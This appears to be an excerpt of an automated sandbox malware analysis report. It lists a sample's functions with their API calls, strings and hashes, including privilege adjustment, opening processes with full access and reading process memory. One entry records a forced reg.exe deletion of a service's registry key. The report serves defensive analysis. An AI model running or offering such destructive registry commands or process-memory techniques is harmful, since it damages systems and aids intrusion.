                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s_strncpy
                                                                                  • String ID: C:\pl.txt
                                                                                  • API String ID: 2532819045-85274317
                                                                                  • Opcode ID: 80222125cd1e5c703d248e771f74134fdc6a87b046a7d4fe4d79354fbf4c0d91
                                                                                  • Instruction ID: 9a12f440da1eecef85baf5d5750d992511909895e6b3a9aff83c9941eaee99a0
                                                                                  • Opcode Fuzzy Hash: 80222125cd1e5c703d248e771f74134fdc6a87b046a7d4fe4d79354fbf4c0d91
                                                                                  • Instruction Fuzzy Hash: 101129712052049BEB15ABB8C954BB73BE5AF823D4F1A4069E857C72A1DF31FC0AC791
                                                                                  Function 6A6F5C8C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6A6F5CCC
                                                                                  • GetSystemMetrics.USER32(00000000), ref: 6A6F5CE4
                                                                                  • GetSystemMetrics.USER32(00000001), ref: 6A6F5CEB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$Metrics$InfoParameters
                                                                                  • String ID: B$DISPLAY
                                                                                  • API String ID: 3136151823-3316187204
                                                                                  • Opcode ID: b1c0211cea7d574b5ba1f76c646f1f15916ab082cb6640ac1c882bd177b39b1b
                                                                                  • Instruction ID: 196064fa6743fba83b3edabf380cbc078968a5316fdebbc25582433eea1fff22
                                                                                  • Opcode Fuzzy Hash: b1c0211cea7d574b5ba1f76c646f1f15916ab082cb6640ac1c882bd177b39b1b
                                                                                  • Instruction Fuzzy Hash: 2C11CD71602225ABDF119F64CC88A5B7FEEEF06750B158865FD05AF006DA70CD02CBE5
                                                                                  Function 6A6E0680 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E06A8
                                                                                    • Part of subcall function 6A6E05A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,?), ref: 6A6E05C3
                                                                                    • Part of subcall function 6A6E05A0: _memset.LIBCMT ref: 6A6E05DA
                                                                                    • Part of subcall function 6A6E05A0: Process32First.KERNEL32 ref: 6A6E05F0
                                                                                    • Part of subcall function 6A6E05A0: CloseHandle.KERNEL32(00000000), ref: 6A6E05FA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                  • String ID: .$l$olp$p
                                                                                  • API String ID: 113637525-2661486703
                                                                                  • Opcode ID: 01422e504d6fc8e54cd2a533702d6b91ea73c1eb3b5b770aa69f2e0179c1139d
                                                                                  • Instruction ID: 3a52ebcade0b0906d5a30bc71a6f92df1d05f16464b57d018fddb8aef829ee8b
                                                                                  • Opcode Fuzzy Hash: 01422e504d6fc8e54cd2a533702d6b91ea73c1eb3b5b770aa69f2e0179c1139d
                                                                                  • Instruction Fuzzy Hash: 1C21516110D3C19ED712CB689444BDBBFE56F96248F08895DE4D847242DA75D60CCBA3
                                                                                  Function 6A6E7D50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _malloc.LIBCMT ref: 6A6E7D97
                                                                                    • Part of subcall function 6A6FDB7C: __FF_MSGBANNER.LIBCMT ref: 6A6FDB9F
                                                                                    • Part of subcall function 6A6FDB7C: __NMSG_WRITE.LIBCMT ref: 6A6FDBA6
                                                                                    • Part of subcall function 6A6FDB7C: HeapAlloc.KERNEL32(00000000,?,00000001,00000000,00000000,?,6A706F8E,?,00000001,?,?,6A705E77,00000018,6A726C18,0000000C,6A705F08), ref: 6A6FDBF3
                                                                                  • _memset.LIBCMT ref: 6A6E7DAA
                                                                                    • Part of subcall function 6A6E7290: _malloc.LIBCMT ref: 6A6E72DC
                                                                                    • Part of subcall function 6A6E7290: _memset.LIBCMT ref: 6A6E72EC
                                                                                  • _memcpy_s.LIBCMT ref: 6A6E7DDB
                                                                                    • Part of subcall function 6A6FE26F: __lock.LIBCMT ref: 6A6FE28D
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_find_block.LIBCMT ref: 6A6FE298
                                                                                    • Part of subcall function 6A6FE26F: ___sbh_free_block.LIBCMT ref: 6A6FE2A7
                                                                                    • Part of subcall function 6A6FE26F: HeapFree.KERNEL32(00000000,?,6A726890,0000000C,6A705ECE,00000000,6A726C18,0000000C,6A705F08,?,?,?,6A70F988,00000004,6A726F98,0000000C), ref: 6A6FE2D7
                                                                                    • Part of subcall function 6A6FE26F: GetLastError.KERNEL32(?,6A70F988,00000004,6A726F98,0000000C,6A706FD8,?,?,00000000,00000000,00000000,?,6A705835,00000001,00000214), ref: 6A6FE2E8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Heap_malloc_memset$AllocErrorFreeLast___sbh_find_block___sbh_free_block__lock_memcpy_s
                                                                                  • String ID: $:rj$$:rj
                                                                                  • API String ID: 3311450307-2097293139
                                                                                  • Opcode ID: 6cffbc03f1cf9f14294218331b1f92a19b406e7b704ada8274f7825eb843a087
                                                                                  • Instruction ID: 5ec57d6e44c542770cb242586750ffe13dcf0116d8435051fff5ca3be165e3ed
                                                                                  • Opcode Fuzzy Hash: 6cffbc03f1cf9f14294218331b1f92a19b406e7b704ada8274f7825eb843a087
                                                                                  • Instruction Fuzzy Hash: F61142F150C381AFE700CF54D985A1BBBE8FB95608F444E2DF58497241EB38DA088BA7
                                                                                  Function 0BE91C0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RtlInitializeCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91C23
                                                                                  • RtlEnterCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91C36
                                                                                  • LocalAlloc.KERNEL32(00000000,00000FF8,0BEFB5CC,00000000,;(), ref: 0BE91C60
                                                                                  • RtlLeaveCriticalSection.NTDLL(0BEFB5CC), ref: 0BE91CCE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                  • String ID: ;(
                                                                                  • API String ID: 730355536-3979793246
                                                                                  • Opcode ID: 01aec1b9aad86d89e0e45f5154dbb86d056672d4495cf90fd85dd5529d23c2f7
                                                                                  • Instruction ID: 7d9e43d2e2c7deeeb8429a6a733466dd65af3ed326f2001482ffa66addc04f48
                                                                                  • Opcode Fuzzy Hash: 01aec1b9aad86d89e0e45f5154dbb86d056672d4495cf90fd85dd5529d23c2f7
                                                                                  • Instruction Fuzzy Hash: 571198B0604203FFDF19EBB6E50275877E6DB89304F11A0A5E210B7780C6788E44CB66
                                                                                  Function 0BE93C30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C52
                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C85
                                                                                  • RegCloseKey.ADVAPI32(?,0BE93CA8,00000000,?,00000004,00000000,0BE93CA1,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0BE93C9B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseOpenQueryValue
                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                  • API String ID: 3677997916-4173385793
                                                                                  • Opcode ID: a4a0414ba834d7544ebf33e91f3c9cb243f64b3a82a0051e92820e0d728d1bae
                                                                                  • Instruction ID: c5d738651cf60d14dbe8a5c5c7bc97ed203b02fa27a8e3aeb1a591c63f11bb0f
                                                                                  • Opcode Fuzzy Hash: a4a0414ba834d7544ebf33e91f3c9cb243f64b3a82a0051e92820e0d728d1bae
                                                                                  • Instruction Fuzzy Hash: 0001D875A40709BEEF11DB90ED42BAD77FCE748B00F900061BA14E2580E6749A14C768
                                                                                  Function 6A6D83C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
                                                                                    • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
                                                                                    • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
                                                                                    • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
                                                                                    • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8415
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8443
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$ProcessVirtual$AllocateCloseHandleInformationModule32OpenQuerySystem$AdjustCreateFirstFreeNextPrivilegeReadSnapshotToolhelp32_memset
                                                                                  • String ID: D3DX81ab.dll$[$^
                                                                                  • API String ID: 3593499547-4121992622
                                                                                  • Opcode ID: 86ecef88f3fbb365384cf345d486885f0fec1d36ad62b64806b22bc1e4406a2e
                                                                                  • Instruction ID: de720b9190465614018abd72c61529b060d2d5e467be7369fead5742c8aeb48c
                                                                                  • Opcode Fuzzy Hash: 86ecef88f3fbb365384cf345d486885f0fec1d36ad62b64806b22bc1e4406a2e
                                                                                  • Instruction Fuzzy Hash: D601D621509390AAD3009B698C4975B7ED85FC6651F09862CF8D8D72E1D7B4C909C7B7
                                                                                  Function 6A6DBF00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF26
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 6A6DBF2D
                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,6A6E1A04,?,?,6A6D184E,?), ref: 6A6DBF51
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressCurrentHandleModuleProcProcess
                                                                                  • String ID: IsWow64Process$kernel32
                                                                                  • API String ID: 4190356694-3789238822
                                                                                  • Opcode ID: 16e4318675b6de59d61366d26e614efa2d9d40251b3eb1f8eef7ea1977021ad9
                                                                                  • Instruction ID: 0f3a6a78dbdcf503fa1048959266051117b5db78d4e4305ba6470b0b62749d59
                                                                                  • Opcode Fuzzy Hash: 16e4318675b6de59d61366d26e614efa2d9d40251b3eb1f8eef7ea1977021ad9
                                                                                  • Instruction Fuzzy Hash: 0BE012B2409220BAC71167E4CA0DA8A27FC9B49652F08486EF542D6015DF749C445E61
                                                                                  Function 6A6E197F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E199A
                                                                                  • ShellExecuteA.SHELL32(00000000,open,reg.exe,00000000,00000000,00000000), ref: 6A6E19B7
                                                                                  Strings
                                                                                  • reg.exe, xrefs: 6A6E19AB
                                                                                  • delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\%s /f, xrefs: 6A6E1994
                                                                                  • open, xrefs: 6A6E19B0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
